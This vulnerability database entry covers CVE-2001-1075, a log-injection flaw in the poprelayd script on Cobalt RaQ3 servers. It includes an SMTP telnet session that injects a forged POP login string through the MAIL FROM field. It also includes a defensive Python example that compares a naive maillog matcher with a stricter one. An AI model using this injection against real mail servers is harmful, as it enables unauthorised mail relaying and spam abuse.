Cobalt RaQ3 Server Vulnerability

Vulnerability ID: 1106418    Vulnerability type: Unknown
Published: 2001-07-04    Updated: 2006-08-28
CVE ID: CVE-2001-1075    CNNVD-ID: CNNVD-200107-050
Platform: Linux    CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/20994
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-050
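|Vulnerability Details
The poprelayd script before version 2.0 on Cobalt RaQ3 servers contains a vulnerability. A remote attacker can bypass authentication for mail relaying by causing a "POP login by user" string that contains the attacker's IP address to be injected into the maillog log file.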
|Exploit
source: http://www.securityfocus.com/bid/2986/info

poprelayd is a script that parses /var/log/maillog for valid POP logins. Based on a client's login, it allows the person logged into the POP3 service to also send email from the IP address they are accessing the system with.

poprelayd does not authenticate the entries written to the /var/log/maillog file. A user can therefore cause an arbitrary string to be logged to the file via sendmail, which allows a remote user to relay mail through the SMTP server.

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
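
The following is an added example, not code from the advisory or from poprelayd itself. It contrasts a matcher that accepts the login phrase anywhere in a maillog line with one anchored to the POP daemon's syslog tag. The sample log lines, the `pop3d` program tag and the sendmail record layout are constructed assumptions.

```python
import re

# Constructed sample maillog lines (not taken from a real server).
# Assumptions: the POP daemon logs under the tag "pop3d", and sendmail
# records the rejected envelope sender inside its own log entry.
SAMPLE_MAILLOG = [
    'Jul  4 10:00:01 raq3 pop3d[1234]: '
    'POP login by user "alice" at (10.0.0.5) 10.0.0.5',
    'Jul  4 10:02:17 raq3 sendmail[2345]: f64A2H012345: ruleset=check_mail, '
    'arg1="POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org", '
    'reject=553 Domain name required',
]

IPV4 = r'(\d{1,3}(?:\.\d{1,3}){3})'

# Weak: accepts the login phrase anywhere in the line, so text that a
# remote client got sendmail to log is treated as a POP login record.
NAIVE = re.compile(r'POP login by user "[^"]+" at \([^)]+\) ' + IPV4)

# Stricter: the line must start with a syslog header carrying the
# (assumed) POP daemon tag, and the message must be exactly the login
# record with nothing before or after it.
STRICT = re.compile(
    r'^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d \S+ pop3d\[\d+\]: '
    r'POP login by user "[^"]+" at \([^)]+\) ' + IPV4 + r'$'
)


def relay_ips(lines, pattern):
    """Return the set of client IPs the pattern would authorise for relaying."""
    ips = set()
    for line in lines:
        match = pattern.search(line)
        if match:
            ips.add(match.group(1))
    return ips


if __name__ == "__main__":
    print("naive :", sorted(relay_ips(SAMPLE_MAILLOG, NAIVE)))
    print("strict:", sorted(relay_ips(SAMPLE_MAILLOG, STRICT)))
```

Anchoring on the program tag only addresses text injected through another daemon's log entries; it still relies on the syslog header itself being trustworthy.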
|References

Source: BUGTRAQ
Name: 20010709 Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-07/0150.html
Source: XF
Name: cobalt-poprelayd-mail-relay(6806)
Link: http://xforce.iss.net/static/6806.php
Source: BID
Name: 2986
Link: http://www.securityfocus.com/bid/2986
Source: BUGTRAQ
Name: 20010703 poprelayd and sendmail relay authentication problem (Cobalt Raq3)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-07/0064.html